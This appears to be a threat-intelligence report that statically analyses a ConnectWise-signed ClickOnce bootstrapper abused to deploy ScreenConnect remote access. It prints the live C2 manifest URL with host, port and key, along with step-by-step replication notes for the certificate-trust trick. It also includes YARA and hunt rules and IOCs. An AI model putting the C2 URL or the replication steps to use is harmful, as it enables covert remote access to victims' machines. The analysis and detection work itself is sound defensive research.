050e582512aac223eecc32d19baf386c61353c826404dc4234dfeacd24c0ff12connectwise: 050e5825 — ClickOnce bootstrapper, May 2025 build with 84.54.33.84 C2
Executive Summary
A 305 KB MSVC-compiled PE32 ClickOnce bootstrapper signed by ConnectWise, LLC (DigiCert). Eighth confirmed sibling in the ScreenConnect abuse cluster. New compile timestamp (May 20 2025), same PDB and import surface as Apr 2025 twins (81adbf9a/604e1cc7). C2 IP 84.54.33.84:8041 reuses the same infrastructure seen in Nov 2022 MSI-bundle sibling 73a8126b. Delegates all payload delivery to dfshim!ShOpenVerbApplicationW after installing its own publisher certificate into TrustedPublisher. Static-only; CAPE skipped.
What It Is
- Format: PE32 executable (GUI), Intel 80386, 5 sections ^[file.txt]
- Size: 312,528 bytes
- Compile time: Tue May 20 19:01:23 2025 UTC ^[pefile.txt:34]
- Linker: MSVC 14.40 (Visual Studio 2022) ^[exiftool.json:18]
- PDB path:
C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb^[strings.txt:308] ^[rabin2-info.txt:13] - Language: C/C++ (CRT strings, no .NET metadata) ^[rabin2-info.txt:19]
- Signed: Valid Authenticode by ConnectWise, LLC (Tampa, Florida), issued by DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 ^[strings.txt:700] ^[binwalk.txt:7]
- Certificate signing time: 2025-05-20 19:14:19Z ^[strings.txt:713]
- Guard flags: CastGuard only (
0x100); no CFG, no SafeSEH ^[pefile.txt:415] - Imports: KERNEL32.dll (CRT + loader) and CRYPT32.dll (certificate store operations) ^[pefile.txt:239-344]
- No exports, no packer, no anti-debug, no VM checks.
This sample is a cluster sibling of the ConnectWise ClickOnce bootstrapper family. Shared build fingerprint, entry-point logic, and certificate-trust bootstrap are documented at connectwise; this report covers per-sample deltas only.
How It Works
See connectwise entity page and sibling report 81adbf9a for the full certificate-trust bootstrap → ClickOnce deployment chain. ^[/intel/analyses/81adbf9af2875a3f442a6453a2e4cc637ea8642a7ddedf07134a853620daa7e6.html]
This sample executes the identical two-stage flow:
- Extracts its own Authenticode signer certificates via
CryptQueryObject+CryptMsgGetParam. - Installs them into the
TrustedPublisherstore withCertAddCertificateContextToStore. - Loads
dfshim.dll→ resolvesShOpenVerbApplicationW→ launches remote.applicationmanifest. - On any Crypt32 failure, sleeps 40 s (
0x9c40ms) and retries. ^[r2:main]
Per-sample delta — C2 infrastructure and timeline:
| Field | This sample (050e5825) | Sibling 81adbf9a | Sibling 73a8126b (MSI era) |
|---|---|---|---|
| Variant | ClickOnce bootstrapper (Variant B) | ClickOnce bootstrapper (Variant B) | MSI bundle (Variant A) |
| Compile time | May 20 2025 19:01:23 UTC | Apr 8 2025 18:34:09 UTC | Nov 2022 |
| C2 IP | 84.54.33.84 |
134.122.4.2 |
84.54.33.84 |
| Protocol | https:// |
http:// |
http:// (MSI direct) |
| Port | 8041 |
8041 |
8041 |
| URL path | /Bin/ScreenConnect.Client.application |
/Bin/ScreenConnect.Client.application |
(embedded MSI tables) |
The C2 IP 84.54.33.84 first appeared in the Nov 2022 MSI-bundle sibling 73a8126b. Its reappearance here, ~2.5 years later in a completely different deployment morph, further confirms the attacker maintains a stable IP pool across variant generations. ^[entities/connectwise.md]
C2 URL
https://84.54.33.84/Bin/ScreenConnect.Client.application?h=84.54.33.84&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQCdLjAD8yszihPgOEc2eP4iyP%2f7mfVDiz7Z%2fkjBjBEEhJhrg2GrG1Ns7mZe1LsyQGju4XhsfbfjSu2p2a3pkzdO76r69wzEAMS2zz8HSAYH2OAd8pGPIOqhrkBR8ZHgiOx%2fRIxrjfCVGGodbBe6pD%2fp8nZrIRMaN%2ba9YN8%2bK2MN305MUjoKryIvKPVwSmnFavzQ1qGnE3RBVw5Kc8J3blUJn612ObUvDQh1bbqX0TGXgEMC5cqzVX3GHK0HTcqTYB%2fAhi%2fWi9hJ4gLMsMZKftSVrtcMGEDOTGCbAUn621vyUCJWVSa1XGFC6zJZCt9TGYdz6UHfwEFh3jEXONvhlPvc
``` ^[strings.txt] (wide-char strings)
- `h=84.54.33.84` — relay host (same as C2 IP)
- `p=8041` — listener port (consistent across all siblings)
- `k=` — base64-wrapped RSA key (ScreenConnect session/installation key)
## Decompiled Behavior
**Entry point (`entry0` @ 0x401532)** is standard MSVC CRT startup: initializes security cookie (`GuardCFCheckFunctionPointer` @ 0x43f18c), runs dynamic initializers (`fcn.0040dff9` iterating function-pointer table), then dispatches to `main(argc, argv, envp)`. ^[r2:entry0]
**Certificate-trust bootstrap (`fcn.0040e114` chain):**
- Calls `fcn.0041034b` which loads `dfshim.dll` and resolves `ShOpenVerbApplicationW` via `GetProcAddress`.
- Uses `CryptQueryObject` to inspect its own file signature.
- Enumerates signer certificates and installs them into `TrustedPublisher` via `CertAddCertificateContextToStore`.
- On failure, sleeps 40 seconds (`Sleep(0x9c40)`) and retries.
**Notable import:** `CertDeleteCertificateFromStore` is imported (same as sibling `604e1cc7`), suggesting touch-and-go certificate cleanup after the ClickOnce launch — a post-deployment hygiene step not seen in the earliest variants. ^[pefile.txt:336]
## C2 Infrastructure
| Indicator | Value |
|---|---|
| C2 IP | `84.54.33.84` |
| Port | `8041` |
| Protocol | HTTPS |
| URL | `https://84.54.33.84/Bin/ScreenConnect.Client.application?h=84.54.33.84&p=8041&k=<key>` |
| Application name | `ScreenConnect.Client.application` |
| Product | ConnectWise ScreenConnect (abused) |
## Interesting Tidbits
- **Compile timestamp to the second precision** across Apr 2025 twins (`81adbf9a`/`604e1cc7`) and this May 2025 build suggests a CI/CD pipeline with per-build parameterization for C2 endpoints, not manual rebuilds. The PDB path references `C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb` — a build-agent path, not a developer workstation. ^[strings.txt:308]
- **Certificate signing time (19:14:19Z)** is ~13 minutes after compile time (19:01:23Z), indicating automated signing in the same pipeline. ^[strings.txt:713]
- **HTTPS upgrade:** The Apr 2025 twin `604e1cc7` was the first observed sibling with `https://`; this May 2025 build also uses `https://`, suggesting the attacker has standardized on encrypted transport for ClickOnce manifests.
- **No network imports in IAT:** All HTTP is delegated to `dfshim.dll` → `dfsvc.exe` → `dfsvc.exe`. The binary itself never opens a socket. This is a deliberate opsec choice: the bootstrapper's network footprint is indistinguishable from legitimate ClickOnce application installs. ^[pefile.txt:239-344]
- **Certificate chain still validates:** The DigiCert Trusted G4 root is present and unexpired; the ConnectWise LLC leaf certificate has not been revoked as of analysis date. ^[binwalk.txt:7-13]
## How To Mess With It (Homelab Replication)
This is a **legitimate tool abuse** pattern, not a custom malware build. Replication requires:
1. A valid code-signing certificate (self-signed for lab; stolen/compromised for real threat actors).
2. A ClickOnce `.application` manifest pointing to a remote `.deploy` package.
3. A native bootstrapper that:
- Calls `CryptQueryObject` on its own file.
- Extracts signer certs with `CryptMsgGetParam`.
- Adds them to `TrustedPublisher` with `CertAddCertificateContextToStore`.
- Loads `dfshim.dll` and calls `ShOpenVerbApplicationW("https://host/app.application")`.
For a buildable skeleton, see the "How To Mess With It" section in `81adbf9a` report. ^[/intel/analyses/81adbf9af2875a3f442a6453a2e4cc637ea8642a7ddedf07134a853620daa7e6.html]
## Deployable Signatures
### YARA rule
```yara
rule ConnectWise_ClickOnce_Bootstrapper {
meta:
description = "ConnectWise ScreenConnect ClickOnce bootstrapper abuse"
author = "PacketPursuit"
date = "2026-08-03"
family = "connectwise"
confidence = "high"
strings:
$pdb = "ClickOnceRunner.pdb" ascii wide
$dfshim = "dfshim.dll" ascii wide
$shopen = "ShOpenVerbApplicationW" ascii wide
$trusted = "TrustedPublisher" ascii wide
$opus = "1.3.6.1.4.1.311.4.1.1" ascii wide
$screen = "ScreenConnect.Client.application" ascii wide
$url_pattern = /https?:\/\/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/Bin\/ScreenConnect\.Client\.application\?h=/ wide
$cert_create = "CertCreateCertificateContext" ascii
$cert_add = "CertAddCertificateContextToStore" ascii
$cert_open = "CertOpenSystemStoreA" ascii
$sleep_40 = { 68 40 9C 00 00 } // push 0x9c40 ; Sleep
condition:
uint16(0) == 0x5A4D and
filesize < 500KB and
$pdb and
$dfshim and
$shopen and
$trusted and
$opus and
any of ($cert_*)
}
Behavioral hunt query (Sigma-like)
title: ConnectWise ClickOnce Bootstrapper Execution
detection:
selection_process:
- Image|endswith: '\ClickOnceRunner.exe'
- CommandLine|contains: 'ScreenConnect.Client.application'
selection_cert:
- Image|endswith: '\ClickOnceRunner.exe'
- TargetObject|contains: 'TrustedPublisher'
selection_dfshim:
- ImageLoaded|endswith: '\dfshim.dll'
- ParentImage|endswith: '\ClickOnceRunner.exe'
condition: 1 of selection_*
IOC list
| Indicator | Type | Notes |
|---|---|---|
050e582512aac223eecc32d19baf386c61353c826404dc4234dfeacd24c0ff12 |
SHA-256 | This sample |
84.54.33.84 |
IPv4 | C2 relay / ScreenConnect listener |
84.54.33.84:8041 |
IP:Port | Listener port (consistent across all siblings) |
https://84.54.33.84/Bin/ScreenConnect.Client.application |
URL | ClickOnce manifest URL |
C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb |
PDB | Build pipeline leak |
TrustedPublisher |
Registry | Certificate store target |
1.3.6.1.4.1.311.4.1.1 |
OID | SPC_SP_OPUS_INFO_OBJID (ClickOnce publisher info) |
| ConnectWise, LLC | Authenticode Subject | Tampa, Florida |
| DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 | Issuer | Intermediate CA |
Behavioral fingerprint
This binary extracts its own Authenticode signature, installs the publisher certificate into the Windows TrustedPublisher store, then loads dfshim.dll and calls ShOpenVerbApplicationW to silently install a remote ClickOnce .application manifest from a hardcoded HTTPS URL (https://<IP>:8041/Bin/ScreenConnect.Client.application). It contains no direct network APIs, no packer, no anti-debug, and no VM detection. All evasion is in the valid signature and the legitimate ClickOnce trust chain. The binary retries on failure with a 40-second sleep.
Detection Signatures
| Technique | MITRE ID | Evidence |
|---|---|---|
| Install root / publisher certificate | T1553.004 | CertOpenSystemStoreA("TrustedPublisher"), CertAddCertificateContextToStore ^[pefile.txt:239-344] |
| Remote access software abuse | T1219 | Hard-coded ScreenConnect C2 endpoint, dfshim!ShOpenVerbApplicationW ^[strings.txt] |
| Ingress tool transfer | T1105 | ClickOnce manifest download via delegated HTTP/S ^[strings.txt] |
| Valid Accounts (code-signing abuse) | T1078 | Authenticode by ConnectWise, LLC ^[strings.txt:700] |
| Application-layer C2 | T1071.001 | HTTP/S delegated to ClickOnce runtime ^[strings.txt] |
| User execution | T1204.002 | Malicious .application execution flow ^[strings.txt] |
References
/intel/analyses/81adbf9af2875a3f442a6453a2e4cc637ea8642a7ddedf07134a853620daa7e6.html— Canonical deep-dive: first observed ClickOnce bootstrapper (Apr 2025)/intel/analyses/604e1cc7d2a390a2d211239f4335cb0c0d80d8b9ee48c35f823a78d60e861886.html— Seventh sibling: cross-variant IP reuse (Apr 2025)/intel/analyses/9477ccddefa6fd57cb2ab68a6cd77229dd2e2bf87f573e2b80eb60555d94e530.html— Fourth sibling (Apr 2025)/intel/analyses/73a8126b8d5443295250815df160f550effeedf1f8adfd0ac2d5160824ca8f37.html— Sixth sibling: MSI bundle with same C2 IP (Nov 2022)entities/connectwise.md— Family entity pagetechniques/clickonce-certificate-trust-bootstrap.md— Technique deep-dive
Provenance
- File-type:
filev5.44 ^[file.txt] - ExifTool: v12.76 ^[exiftool.json]
- pefile: Python pefile library ^[pefile.txt]
- radare2:
rabin2 -I+r2 -A^[rabin2-info.txt] - strings:
strings -a/strings -el^[strings.txt] - binwalk: v2.3.4 ^[binwalk.txt]
- FLOSS: flare-floss v3.1.1 — failed (CLI argument error) ^[floss.txt]
- capa: v8.0.1 — failed (missing signatures) ^[capa.txt]
- CAPE: skipped — no Windows guest available ^[dynamic-analysis.md]